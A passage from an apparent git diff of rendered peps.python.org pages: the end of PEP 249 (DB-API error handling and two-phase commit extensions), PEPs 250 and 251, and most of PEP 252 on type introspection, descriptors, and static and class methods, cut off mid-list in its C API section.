Deprecation notice: Even though several database modules implement +both the read and write nature of this attribute, setting the +autocommit mode by writing to the attribute is deprecated, since +this may result in I/O and related exceptions, making it difficult +to implement in an async context. [13]

+

Warning Message: “DB-API extension connection.autocommit used”

+
+
+
+
+

Optional Error Handling Extensions

+

The core DB API specification only introduces a set of exceptions +which can be raised to report errors to the user. In some cases, +exceptions may be too disruptive for the flow of a program or even +render execution impossible.

+

For these cases and in order to simplify error handling when dealing +with databases, database module authors may choose to implement user +definable error handlers. This section describes a standard way of +defining these error handlers.

+
+
Connection.errorhandler, Cursor.errorhandler
Read/write attribute which references an error handler to call in +case an error condition is met.

The handler must be a Python callable taking the following arguments:

+
errorhandler(connection, cursor, errorclass, errorvalue)
+

where connection is a reference to the connection on which the +cursor operates, cursor a reference to the cursor (or None in +case the error does not apply to a cursor), errorclass is an +error class which to instantiate using errorvalue as +construction argument.

+

The standard error handler should add the error information to the +appropriate .messages attribute (Connection.messages or +Cursor.messages) and raise the exception defined by the given +errorclass and errorvalue parameters.

+

If no .errorhandler is set (the attribute is None), the +standard error handling scheme as outlined above, should be +applied.

+

Warning Message: “DB-API extension .errorhandler used”

+
+
+

Cursors should inherit the .errorhandler setting from their +connection objects at cursor creation time.

+
+
+

Optional Two-Phase Commit Extensions

+

Many databases have support for two-phase commit (TPC) which allows +managing transactions across multiple database connections and other +resources.

+

If a database backend provides support for two-phase commit and the +database module author wishes to expose this support, the following +API should be implemented. NotSupportedError should be raised, if the +database backend support for two-phase commit can only be checked at +run-time.

+
+

TPC Transaction IDs

+

As many databases follow the XA specification, transaction IDs are +formed from three components:

+
    +
  • a format ID
  • +
  • a global transaction ID
  • +
  • a branch qualifier
  • +
+

For a particular global transaction, the first two components should +be the same for all resources. Each resource in the global +transaction should be assigned a different branch qualifier.

+

The various components must satisfy the following criteria:

+
    +
  • format ID: a non-negative 32-bit integer.
  • +
  • global transaction ID and branch qualifier: byte strings no +longer than 64 characters.
  • +
+

Transaction IDs are created with the .xid() Connection method:

+
+
.xid(format_id, global_transaction_id, branch_qualifier)
Returns a transaction ID object suitable for passing to the +.tpc_*() methods of this connection.

If the database connection does not support TPC, a +NotSupportedError is raised.

+

The type of the object returned by .xid() is not defined, but +it must provide sequence behaviour, allowing access to the three +components. A conforming database module could choose to +represent transaction IDs with tuples rather than a custom object.

+
+
+
+
+

TPC Connection Methods

+
+
.tpc_begin(xid)
Begins a TPC transaction with the given transaction ID xid.

This method should be called outside of a transaction (i.e. +nothing may have executed since the last .commit() or +.rollback()).

+

Furthermore, it is an error to call .commit() or .rollback() +within the TPC transaction. A ProgrammingError is raised, if the +application calls .commit() or .rollback() during an active +TPC transaction.

+

If the database connection does not support TPC, a +NotSupportedError is raised.

+
+
+
+
.tpc_prepare()
Performs the first phase of a transaction started with +.tpc_begin(). A ProgrammingError should be raised if this +method outside of a TPC transaction.

After calling .tpc_prepare(), no statements can be executed +until .tpc_commit() or .tpc_rollback() have been called.

+
+
+
+
.tpc_commit([ xid ])
When called with no arguments, .tpc_commit() commits a TPC +transaction previously prepared with .tpc_prepare().

If .tpc_commit() is called prior to .tpc_prepare(), a single +phase commit is performed. A transaction manager may choose to do +this if only a single resource is participating in the global +transaction.

+

When called with a transaction ID xid, the database commits the +given transaction. If an invalid transaction ID is provided, a +ProgrammingError will be raised. This form should be called +outside of a transaction, and is intended for use in recovery.

+

On return, the TPC transaction is ended.

+
+
+
+
.tpc_rollback([ xid ])
When called with no arguments, .tpc_rollback() rolls back a TPC +transaction. It may be called before or after .tpc_prepare().

When called with a transaction ID xid, it rolls back the given +transaction. If an invalid transaction ID is provided, a +ProgrammingError is raised. This form should be called outside +of a transaction, and is intended for use in recovery.

+

On return, the TPC transaction is ended.

+
+
+
+
.tpc_recover()
Returns a list of pending transaction IDs suitable for use with +.tpc_commit(xid) or .tpc_rollback(xid).

If the database does not support transaction recovery, it may +return an empty list or raise NotSupportedError.

+
+
+
+
+
+

Frequently Asked Questions

+

The database SIG often sees reoccurring questions about the DB API +specification. This section covers some of the issues people sometimes +have with the specification.

+

Question:

+

How can I construct a dictionary out of the tuples returned by +.fetch*():

+

Answer:

+

There are several existing tools available which provide helpers for +this task. Most of them use the approach of using the column names +defined in the cursor attribute .description as basis for the keys +in the row dictionary.

+

Note that the reason for not extending the DB API specification to +also support dictionary return values for the .fetch*() methods is +that this approach has several drawbacks:

+
    +
  • Some databases don’t support case-sensitive column names or +auto-convert them to all lowercase or all uppercase characters.
  • +
  • Columns in the result set which are generated by the query (e.g. +using SQL functions) don’t map to table column names and databases +usually generate names for these columns in a very database specific +way.
  • +
+

As a result, accessing the columns through dictionary keys varies +between databases and makes writing portable code impossible.

+
+
+

Major Changes from Version 1.0 to Version 2.0

+

The Python Database API 2.0 introduces a few major changes compared to +the 1.0 version. Because some of these changes will cause existing DB +API 1.0 based scripts to break, the major version number was adjusted +to reflect this change.

+

These are the most important changes from 1.0 to 2.0:

+
    +
  • The need for a separate dbi module was dropped and the functionality +merged into the module interface itself.
  • +
  • New constructors and Type Objects were added for date/time +values, the RAW Type Object was renamed to BINARY. The +resulting set should cover all basic data types commonly found in +modern SQL databases.
  • +
  • New constants (apilevel, threadsafety, paramstyle) and methods +(.executemany(), .nextset()) were added to provide better +database bindings.
  • +
  • The semantics of .callproc() needed to call stored procedures are +now clearly defined.
  • +
  • The definition of the .execute() return value changed. +Previously, the return value was based on the SQL statement type +(which was hard to implement right) — it is undefined now; use the +more flexible .rowcount attribute instead. Modules are free to +return the old style return values, but these are no longer mandated +by the specification and should be considered database interface +dependent.
  • +
  • Class based exceptions were incorporated into the specification. +Module implementors are free to extend the exception layout defined +in this specification by subclassing the defined exception classes.
  • +
+

Post-publishing additions to the DB API 2.0 specification:

+
    +
  • Additional optional DB API extensions to the set of core +functionality were specified.
  • +
+
+
+

Open Issues

+

Although the version 2.0 specification clarifies a lot of questions +that were left open in the 1.0 version, there are still some remaining +issues which should be addressed in future versions:

+
    +
  • Define a useful return value for .nextset() for the case where a +new result set is available.
  • +
  • Integrate the decimal module Decimal object +for use as loss-less monetary and decimal interchange format.
  • +
+
+
+

Footnotes

+ +
+
+

Acknowledgements

+

Many thanks go to Andrew Kuchling who converted the Python Database +API Specification 2.0 from the original HTML format into the PEP +format in 2001.

+

Many thanks to James Henstridge for leading the discussion which led to +the standardization of the two-phase commit API extensions in 2008.

+

Many thanks to Daniele Varrazzo for converting the specification from +text PEP format to ReST PEP format, which allows linking to various +parts in 2012.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0249.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0250/index.html b/pep-0250/index.html new file mode 100644 index 00000000000..378c3641b29 --- /dev/null +++ b/pep-0250/index.html @@ -0,0 +1,245 @@ + + + + + + + + PEP 250 – Using site-packages on Windows | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 250 – Using site-packages on Windows

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
30-Mar-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

The standard Python distribution includes a directory +Lib/site-packages, which is used on Unix platforms to hold +locally installed modules and packages. The site.py module +distributed with Python includes support for locating other +modules in the site-packages directory.

+

This PEP proposes that the site-packages directory should be used +on the Windows platform in a similar manner.

+
+
+

Motivation

+

On Windows platforms, the default setting for sys.path does not +include a directory suitable for users to install locally +developed modules. The “expected” location appears to be the +directory containing the Python executable itself. This is also +the location where distutils (and distutils-generated installers) +installs packages. Including locally developed code in the same +directory as installed executables is not good practice.

+

Clearly, users can manipulate sys.path, either in a locally +modified site.py, or in a suitable sitecustomize.py, or even via +.pth files. However, there should be a standard location for such +files, rather than relying on every individual site having to set +their own policy.

+

In addition, with distutils becoming more prevalent as a means of +distributing modules, the need for a standard install location for +distributed modules will become more common. It would be better +to define such a standard now, rather than later when more +distutils-based packages exist which will need rebuilding.

+

It is relevant to note that prior to Python 2.1, the site-packages +directory was not included in sys.path for Macintosh platforms. +This has been changed in 2.1, and Macintosh includes sys.path now, +leaving Windows as the only major platform with no site-specific +modules directory.

+
+
+

Implementation

+

The implementation of this feature is fairly trivial. All that +would be required is a change to site.py, to change the section +setting sitedirs. The Python 2.1 version has:

+
if os.sep == '/':
+    sitedirs = [makepath(prefix,
+                        "lib",
+                        "python" + sys.version[:3],
+                        "site-packages"),
+                makepath(prefix, "lib", "site-python")]
+elif os.sep == ':':
+    sitedirs = [makepath(prefix, "lib", "site-packages")]
+else:
+    sitedirs = [prefix]
+
+
+

A suitable change would be to simply replace the last 4 lines with:

+
else:
+    sitedirs == [prefix, makepath(prefix, "lib", "site-packages")]
+
+
+

Changes would also be required to distutils, to reflect this change +in policy. A patch is available on Sourceforge, patch ID 445744, +which implements this change. Note that the patch checks the Python +version and only invokes the new behaviour for Python versions from +2.2 onwards. This is to ensure that distutils remains compatible +with earlier versions of Python.

+

Finally, the executable code which implements the Windows installer +used by the bdist_wininst command will need changing to use the new +location. A separate patch is available for this, currently +maintained by Thomas Heller.

+
+
+

Notes

+
    +
  • This change does not preclude packages using the current +location – the change only adds a directory to sys.path, it +does not remove anything.
  • +
  • Both the current location (sys.prefix) and the new directory +(site-packages) are included in sitedirs, so that .pth files +will be recognised in either location.
  • +
  • This proposal adds a single additional site-packages directory +to sitedirs. On Unix platforms, two directories are added, one +for version-independent files (Python code) and one for +version-dependent code (C extensions). This is necessary on +Unix, as the sitedirs include a common (across Python versions) +package location, in /usr/local by default. As there is no such +common location available on Windows, there is also no need for +having two separate package directories.
  • +
  • If users want to keep DLLs in a single location on Windows, rather +than keeping them in the package directory, the DLLs subdirectory +of the Python install directory is already available for that +purpose. Adding an extra directory solely for DLLs should not be +necessary.
  • +
+
+
+

Open Issues

+
    +
  • Comments from Unix users indicate that there may be issues with +the current setup on the Unix platform. Rather than become +involved in cross-platform issues, this PEP specifically limits +itself to the Windows platform, leaving changes for other platforms +to be covered in other PEPs.
  • +
  • There could be issues with applications which embed Python. To the +author’s knowledge, there should be no problem as a result of this +change. There have been no comments (supportive or otherwise) from +users who embed Python.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0250.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0251/index.html b/pep-0251/index.html new file mode 100644 index 00000000000..15b174e6ec9 --- /dev/null +++ b/pep-0251/index.html @@ -0,0 +1,208 @@ + + + + + + + + PEP 251 – Python 2.2 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 251 – Python 2.2 Release Schedule

+
+
Author:
+
Barry Warsaw <barry at python.org>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
17-Apr-2001
+
Python-Version:
+
2.2
+
Post-History:
+
14-Aug-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the Python 2.2 development and release +schedule. The schedule primarily concerns itself with PEP-sized +items. Small bug fixes and changes will occur up until the first +beta release.

+

The schedule below represents the actual release dates of Python +2.2. Note that any subsequent maintenance releases of Python 2.2 +should be covered by separate PEPs.

+
+
+

Release Schedule

+

Tentative future release dates. Note that we’ve slipped this +compared to the schedule posted around the release of 2.2a1.

+
    +
  • 21-Dec-2001: 2.2 [Released] (final release)
  • +
  • 14-Dec-2001: 2.2c1 [Released]
  • +
  • 14-Nov-2001: 2.2b2 [Released]
  • +
  • 19-Oct-2001: 2.2b1 [Released]
  • +
  • 28-Sep-2001: 2.2a4 [Released]
  • +
  • 7-Sep-2001: 2.2a3 [Released]
  • +
  • 22-Aug-2001: 2.2a2 [Released]
  • +
  • 18-Jul-2001: 2.2a1 [Released]
  • +
+
+
+

Release Manager

+

Barry Warsaw was the Python 2.2 release manager.

+
+
+

Release Mechanics

+

We experimented with a new mechanism for releases: a week before +every alpha, beta or other release, we forked off a branch which +became the release. Changes to the branch are limited to the +release manager and his designated ‘bots. This experiment was +deemed a success and should be observed for future releases. See +PEP 101 for the actual release mechanics.

+
+
+

New features for Python 2.2

+

The following new features are introduced in Python 2.2. For a +more detailed account, see Misc/NEWS [2] in the Python +distribution, or Andrew Kuchling’s “What’s New in Python 2.2” +document [3].

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0251.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0252/index.html b/pep-0252/index.html new file mode 100644 index 00000000000..53f401d86f5 --- /dev/null +++ b/pep-0252/index.html @@ -0,0 +1,774 @@ + + + + + + + + PEP 252 – Making Types Look More Like Classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 252 – Making Types Look More Like Classes

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Apr-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes changes to the introspection API for types that +makes them look more like classes, and their instances more like +class instances. For example, type(x) will be equivalent to +x.__class__ for most built-in types. When C is x.__class__, +x.meth(a) will generally be equivalent to C.meth(x, a), and +C.__dict__ contains x’s methods and other attributes.

+

This PEP also introduces a new approach to specifying attributes, +using attribute descriptors, or descriptors for short. +Descriptors unify and generalize several different common +mechanisms used for describing attributes: a descriptor can +describe a method, a typed field in the object structure, or a +generalized attribute represented by getter and setter functions.

+

Based on the generalized descriptor API, this PEP also introduces +a way to declare class methods and static methods.

+

[Editor’s note: the ideas described in this PEP have been incorporated +into Python. The PEP no longer accurately describes the implementation.]

+
+
+

Introduction

+

One of Python’s oldest language warts is the difference between +classes and types. For example, you can’t directly subclass the +dictionary type, and the introspection interface for finding out +what methods and instance variables an object has is different for +types and for classes.

+

Healing the class/type split is a big effort, because it affects +many aspects of how Python is implemented. This PEP concerns +itself with making the introspection API for types look the same +as that for classes. Other PEPs will propose making classes look +more like types, and subclassing from built-in types; these topics +are not on the table for this PEP.

+
+
+

Introspection APIs

+

Introspection concerns itself with finding out what attributes an +object has. Python’s very general getattr/setattr API makes it +impossible to guarantee that there always is a way to get a list +of all attributes supported by a specific object, but in practice +two conventions have appeared that together work for almost all +objects. I’ll call them the class-based introspection API and the +type-based introspection API; class API and type API for short.

+

The class-based introspection API is used primarily for class +instances; it is also used by Jim Fulton’s ExtensionClasses. It +assumes that all data attributes of an object x are stored in the +dictionary x.__dict__, and that all methods and class variables +can be found by inspection of x’s class, written as x.__class__. +Classes have a __dict__ attribute, which yields a dictionary +containing methods and class variables defined by the class +itself, and a __bases__ attribute, which is a tuple of base +classes that must be inspected recursively. Some assumptions here +are:

+
    +
  • attributes defined in the instance dict override attributes +defined by the object’s class;
  • +
  • attributes defined in a derived class override attributes +defined in a base class;
  • +
  • attributes in an earlier base class (meaning occurring earlier +in __bases__) override attributes in a later base class.
  • +
+

(The last two rules together are often summarized as the +left-to-right, depth-first rule for attribute search. This is the +classic Python attribute lookup rule. Note that PEP 253 will +propose to change the attribute lookup order, and if accepted, +this PEP will follow suit.)

+

The type-based introspection API is supported in one form or +another by most built-in objects. It uses two special attributes, +__members__ and __methods__. The __methods__ attribute, if +present, is a list of method names supported by the object. The +__members__ attribute, if present, is a list of data attribute +names supported by the object.

+

The type API is sometimes combined with a __dict__ that works the +same as for instances (for example for function objects in +Python 2.1, f.__dict__ contains f’s dynamic attributes, while +f.__members__ lists the names of f’s statically defined +attributes).

+

Some caution must be exercised: some objects don’t list their +“intrinsic” attributes (like __dict__ and __doc__) in __members__, +while others do; sometimes attribute names occur both in +__members__ or __methods__ and as keys in __dict__, in which case +it’s anybody’s guess whether the value found in __dict__ is used +or not.

+

The type API has never been carefully specified. It is part of +Python folklore, and most third party extensions support it +because they follow examples that support it. Also, any type that +uses Py_FindMethod() and/or PyMember_Get() in its tp_getattr +handler supports it, because these two functions special-case the +attribute names __methods__ and __members__, respectively.

+

Jim Fulton’s ExtensionClasses ignore the type API, and instead +emulate the class API, which is more powerful. In this PEP, I +propose to phase out the type API in favor of supporting the class +API for all types.

+

One argument in favor of the class API is that it doesn’t require +you to create an instance in order to find out which attributes a +type supports; this in turn is useful for documentation +processors. For example, the socket module exports the SocketType +object, but this currently doesn’t tell us what methods are +defined on socket objects. Using the class API, SocketType would +show exactly what the methods for socket objects are, and we can +even extract their docstrings, without creating a socket. (Since +this is a C extension module, the source-scanning approach to +docstring extraction isn’t feasible in this case.)

+
+
+

Specification of the class-based introspection API

+

Objects may have two kinds of attributes: static and dynamic. The +names and sometimes other properties of static attributes are +knowable by inspection of the object’s type or class, which is +accessible through obj.__class__ or type(obj). (I’m using type +and class interchangeably; a clumsy but descriptive term that fits +both is “meta-object”.)

+

(XXX static and dynamic are not great terms to use here, because +“static” attributes may actually behave quite dynamically, and +because they have nothing to do with static class members in C++ +or Java. Barry suggests to use immutable and mutable instead, but +those words already have precise and different meanings in +slightly different contexts, so I think that would still be +confusing.)

+

Examples of dynamic attributes are instance variables of class +instances, module attributes, etc. Examples of static attributes +are the methods of built-in objects like lists and dictionaries, +and the attributes of frame and code objects (f.f_code, +c.co_filename, etc.). When an object with dynamic attributes +exposes these through its __dict__ attribute, __dict__ is a static +attribute.

+

The names and values of dynamic properties are typically stored in +a dictionary, and this dictionary is typically accessible as +obj.__dict__. The rest of this specification is more concerned +with discovering the names and properties of static attributes +than with dynamic attributes; the latter are easily discovered by +inspection of obj.__dict__.

+

In the discussion below, I distinguish two kinds of objects: +regular objects (like lists, ints, functions) and meta-objects. +Types and classes are meta-objects. Meta-objects are also regular +objects, but we’re mostly interested in them because they are +referenced by the __class__ attribute of regular objects (or by +the __bases__ attribute of other meta-objects).

+

The class introspection API consists of the following elements:

+
    +
  • the __class__ and __dict__ attributes on regular objects;
  • +
  • the __bases__ and __dict__ attributes on meta-objects;
  • +
  • precedence rules;
  • +
  • attribute descriptors.
  • +
+

Together, these not only tell us about all attributes defined by +a meta-object, but they also help us calculate the value of a +specific attribute of a given object.

+
    +
  1. The __dict__ attribute on regular objects

    A regular object may have a __dict__ attribute. If it does, +this should be a mapping (not necessarily a dictionary) +supporting at least __getitem__(), keys(), and has_key(). This +gives the dynamic attributes of the object. The keys in the +mapping give attribute names, and the corresponding values give +their values.

    +

    Typically, the value of an attribute with a given name is the +same object as the value corresponding to that name as a key in +the __dict__. In other words, obj.__dict__['spam'] is obj.spam. +(But see the precedence rules below; a static attribute with +the same name may override the dictionary item.)

    +
  2. +
  3. The __class__ attribute on regular objects

    A regular object usually has a __class__ attribute. If it +does, this references a meta-object. A meta-object can define +static attributes for the regular object whose __class__ it +is. This is normally done through the following mechanism:

    +
  4. +
  5. The __dict__ attribute on meta-objects

    A meta-object may have a __dict__ attribute, of the same form +as the __dict__ attribute for regular objects (a mapping but +not necessarily a dictionary). If it does, the keys of the +meta-object’s __dict__ are names of static attributes for the +corresponding regular object. The values are attribute +descriptors; we’ll explain these later. An unbound method is a +special case of an attribute descriptor.

    +

    Because a meta-object is also a regular object, the items in a +meta-object’s __dict__ correspond to attributes of the +meta-object; however, some transformation may be applied, and +bases (see below) may define additional dynamic attributes. In +other words, mobj.spam is not always mobj.__dict__['spam']. +(This rule contains a loophole because for classes, if +C.__dict__['spam'] is a function, C.spam is an unbound method +object.)

    +
  6. +
  7. The __bases__ attribute on meta-objects

    A meta-object may have a __bases__ attribute. If it does, this +should be a sequence (not necessarily a tuple) of other +meta-objects, the bases. An absent __bases__ is equivalent to +an empty sequence of bases. There must never be a cycle in the +relationship between meta-objects defined by __bases__ +attributes; in other words, the __bases__ attributes define a +directed acyclic graph, with arcs pointing from derived +meta-objects to their base meta-objects. (It is not +necessarily a tree, since multiple classes can have the same +base class.) The __dict__ attributes of a meta-object in the +inheritance graph supply attribute descriptors for the regular +object whose __class__ attribute points to the root of the +inheritance tree (which is not the same as the root of the +inheritance hierarchy – rather more the opposite, at the +bottom given how inheritance trees are typically drawn). +Descriptors are first searched in the dictionary of the root +meta-object, then in its bases, according to a precedence rule +(see the next paragraph).

    +
  8. +
  9. Precedence rules

    When two meta-objects in the inheritance graph for a given +regular object both define an attribute descriptor with the +same name, the search order is up to the meta-object. This +allows different meta-objects to define different search +orders. In particular, classic classes use the old +left-to-right depth-first rule, while new-style classes use a +more advanced rule (see the section on method resolution order +in PEP 253).

    +

    When a dynamic attribute (one defined in a regular object’s +__dict__) has the same name as a static attribute (one defined +by a meta-object in the inheritance graph rooted at the regular +object’s __class__), the static attribute has precedence if it +is a descriptor that defines a __set__ method (see below); +otherwise (if there is no __set__ method) the dynamic attribute +has precedence. In other words, for data attributes (those +with a __set__ method), the static definition overrides the +dynamic definition, but for other attributes, dynamic overrides +static.

    +

    Rationale: we can’t have a simple rule like “static overrides +dynamic” or “dynamic overrides static”, because some static +attributes indeed override dynamic attributes; for example, a +key ‘__class__’ in an instance’s __dict__ is ignored in favor +of the statically defined __class__ pointer, but on the other +hand most keys in inst.__dict__ override attributes defined in +inst.__class__. Presence of a __set__ method on a descriptor +indicates that this is a data descriptor. (Even read-only data +descriptors have a __set__ method: it always raises an +exception.) Absence of a __set__ method on a descriptor +indicates that the descriptor isn’t interested in intercepting +assignment, and then the classic rule applies: an instance +variable with the same name as a method hides the method until +it is deleted.

    +
  10. +
  11. Attribute descriptors

    This is where it gets interesting – and messy. Attribute +descriptors (descriptors for short) are stored in the +meta-object’s __dict__ (or in the __dict__ of one of its +ancestors), and have two uses: a descriptor can be used to get +or set the corresponding attribute value on the (regular, +non-meta) object, and it has an additional interface that +describes the attribute for documentation and introspection +purposes.

    +

    There is little prior art in Python for designing the +descriptor’s interface, neither for getting/setting the value +nor for describing the attribute otherwise, except some trivial +properties (it’s reasonable to assume that __name__ and __doc__ +should be the attribute’s name and docstring). I will propose +such an API below.

    +

    If an object found in the meta-object’s __dict__ is not an +attribute descriptor, backward compatibility dictates certain +minimal semantics. This basically means that if it is a Python +function or an unbound method, the attribute is a method; +otherwise, it is the default value for a dynamic data +attribute. Backwards compatibility also dictates that (in the +absence of a __setattr__ method) it is legal to assign to an +attribute corresponding to a method, and that this creates a +data attribute shadowing the method for this particular +instance. However, these semantics are only required for +backwards compatibility with regular classes.

    +
  12. +
+

The introspection API is a read-only API. We don’t define the +effect of assignment to any of the special attributes (__dict__, +__class__ and __bases__), nor the effect of assignment to the +items of a __dict__. Generally, such assignments should be +considered off-limits. A future PEP may define some semantics for +some such assignments. (Especially because currently instances +support assignment to __class__ and __dict__, and classes support +assignment to __bases__ and __dict__.)

+
+
+

Specification of the attribute descriptor API

+

Attribute descriptors may have the following attributes. In the +examples, x is an object, C is x.__class__, x.meth() is a method, +and x.ivar is a data attribute or instance variable. All +attributes are optional – a specific attribute may or may not be +present on a given descriptor. An absent attribute means that the +corresponding information is not available or the corresponding +functionality is not implemented.

+
    +
  • __name__: the attribute name. Because of aliasing and renaming, +the attribute may (additionally or exclusively) be known under a +different name, but this is the name under which it was born. +Example: C.meth.__name__ == 'meth'.
  • +
  • __doc__: the attribute’s documentation string. This may be +None.
  • +
  • __objclass__: the class that declared this attribute. The +descriptor only applies to objects that are instances of this +class (this includes instances of its subclasses). Example: +C.meth.__objclass__ is C.
  • +
  • __get__(): a function callable with one or two arguments that +retrieves the attribute value from an object. This is also +referred to as a “binding” operation, because it may return a +“bound method” object in the case of method descriptors. The +first argument, X, is the object from which the attribute must +be retrieved or to which it must be bound. When X is None, the +optional second argument, T, should be meta-object and the +binding operation may return an unbound method restricted to +instances of T. When both X and T are specified, X should be an +instance of T. Exactly what is returned by the binding +operation depends on the semantics of the descriptor; for +example, static methods and class methods (see below) ignore the +instance and bind to the type instead.
  • +
  • __set__(): a function of two arguments that sets the attribute +value on the object. If the attribute is read-only, this method +may raise a TypeError or AttributeError exception (both are +allowed, because both are historically found for undefined or +unsettable attributes). Example: +C.ivar.set(x, y) ~~ x.ivar = y.
  • +
+
+
+

Static methods and class methods

+

The descriptor API makes it possible to add static methods and +class methods. Static methods are easy to describe: they behave +pretty much like static methods in C++ or Java. Here’s an +example:

+
class C:
+
+    def foo(x, y):
+        print "staticmethod", x, y
+    foo = staticmethod(foo)
+
+C.foo(1, 2)
+c = C()
+c.foo(1, 2)
+
+
+

Both the call C.foo(1, 2) and the call c.foo(1, 2) call foo() with +two arguments, and print “staticmethod 1 2”. No “self” is declared in +the definition of foo(), and no instance is required in the call.

+

The line “foo = staticmethod(foo)” in the class statement is the +crucial element: this makes foo() a static method. The built-in +staticmethod() wraps its function argument in a special kind of +descriptor whose __get__() method returns the original function +unchanged. Without this, the __get__() method of standard +function objects would have created a bound method object for +‘c.foo’ and an unbound method object for ‘C.foo’.

+

(XXX Barry suggests to use “sharedmethod” instead of +“staticmethod”, because the word static is being overloaded in so +many ways already. But I’m not sure if shared conveys the right +meaning.)

+

Class methods use a similar pattern to declare methods that +receive an implicit first argument that is the class for which +they are invoked. This has no C++ or Java equivalent, and is not +quite the same as what class methods are in Smalltalk, but may +serve a similar purpose. According to Armin Rigo, they are +similar to “virtual class methods” in Borland Pascal dialect +Delphi. (Python also has real metaclasses, and perhaps methods +defined in a metaclass have more right to the name “class method”; +but I expect that most programmers won’t be using metaclasses.) +Here’s an example:

+
class C:
+
+    def foo(cls, y):
+        print "classmethod", cls, y
+    foo = classmethod(foo)
+
+C.foo(1)
+c = C()
+c.foo(1)
+
+
+

Both the call C.foo(1) and the call c.foo(1) end up calling foo() +with two arguments, and print “classmethod __main__.C 1”. The +first argument of foo() is implied, and it is the class, even if +the method was invoked via an instance. Now let’s continue the +example:

+
class D(C):
+    pass
+
+D.foo(1)
+d = D()
+d.foo(1)
+
+
+

This prints “classmethod __main__.D 1” both times; in other words, +the class passed as the first argument of foo() is the class +involved in the call, not the class involved in the definition of +foo().

+

But notice this:

+
class E(C):
+    def foo(cls, y): # override C.foo
+        print "E.foo() called"
+        C.foo(y)
+    foo = classmethod(foo)
+
+E.foo(1)
+e = E()
+e.foo(1)
+
+
+

In this example, the call to C.foo() from E.foo() will see class C +as its first argument, not class E. This is to be expected, since +the call specifies the class C. But it stresses the difference +between these class methods and methods defined in metaclasses, +where an upcall to a metamethod would pass the target class as an +explicit first argument. (If you don’t understand this, don’t +worry, you’re not alone.) Note that calling cls.foo(y) would be a +mistake – it would cause infinite recursion. Also note that you +can’t specify an explicit ‘cls’ argument to a class method. If +you want this (e.g. the __new__ method in PEP 253 requires this), +use a static method with a class as its explicit first argument +instead.

+
+
+

C API

+

XXX The following is VERY rough text that I wrote with a different +audience in mind; I’ll have to go through this to edit it more. +XXX It also doesn’t go into enough detail for the C API.

+

A built-in type can declare special data attributes in two ways: +using a struct memberlist (defined in structmember.h) or a struct +getsetlist (defined in descrobject.h). The struct memberlist is +an old mechanism put to new use: each attribute has a descriptor +record including its name, an enum giving its type (various C +types are supported as well as PyObject *), an offset from the +start of the instance, and a read-only flag.

+

The struct getsetlist mechanism is new, and intended for cases +that don’t fit in that mold, because they either require +additional checking, or are plain calculated attributes. Each +attribute here has a name, a getter C function pointer, a setter C +function pointer, and a context pointer. The function pointers +are optional, so that for example setting the setter function +pointer to NULL makes a read-only attribute. The context pointer +is intended to pass auxiliary information to generic getter/setter +functions, but I haven’t found a need for this yet.

+

Note that there is also a similar mechanism to declare built-in +methods: these are PyMethodDef structures, which contain a name +and a C function pointer (and some flags for the calling +convention).

+

Traditionally, built-in types have had to define their own +tp_getattro and tp_setattro slot functions to make these attribute +definitions work (PyMethodDef and struct memberlist are quite +old). There are convenience functions that take an array of +PyMethodDef or memberlist structures, an object, and an attribute +name, and return or set the attribute if found in the list, or +raise an exception if not found. But these convenience functions +had to be explicitly called by the tp_getattro or tp_setattro +method of the specific type, and they did a linear search of the +array using strcmp() to find the array element describing the +requested attribute.

+

I now have a brand spanking new generic mechanism that improves +this situation substantially.

+
    +
  • Pointers to arrays of PyMethodDef, memberlist, getsetlist +structures are part of the new type object (tp_methods, +tp_members, tp_getset).
  • +
  • At type initialization time (in PyType_InitDict()), for each +entry in those three arrays, a descriptor object is created and +placed in a dictionary that belongs to the type (tp_dict).
  • +
  • Descriptors are very lean objects that mostly point to the +corresponding structure. An implementation detail is that all +descriptors share the same object type, and a discriminator +field tells what kind of descriptor it is (method, member, or +getset).
  • +
  • As explained in PEP 252, descriptors have a get() method that +takes an object argument and returns that object’s attribute; +descriptors for writable attributes also have a set() method +that takes an object and a value and set that object’s +attribute. Note that the get() object also serves as a bind() +operation for methods, binding the unbound method implementation +to the object.
  • +
  • Instead of providing their own tp_getattro and tp_setattro +implementation, almost all built-in objects now place +PyObject_GenericGetAttr and (if they have any writable +attributes) PyObject_GenericSetAttr in their tp_getattro and +tp_setattro slots. (Or, they can leave these NULL, and inherit +them from the default base object, if they arrange for an +explicit call to PyType_InitDict() for the type before the first +instance is created.)
  • +
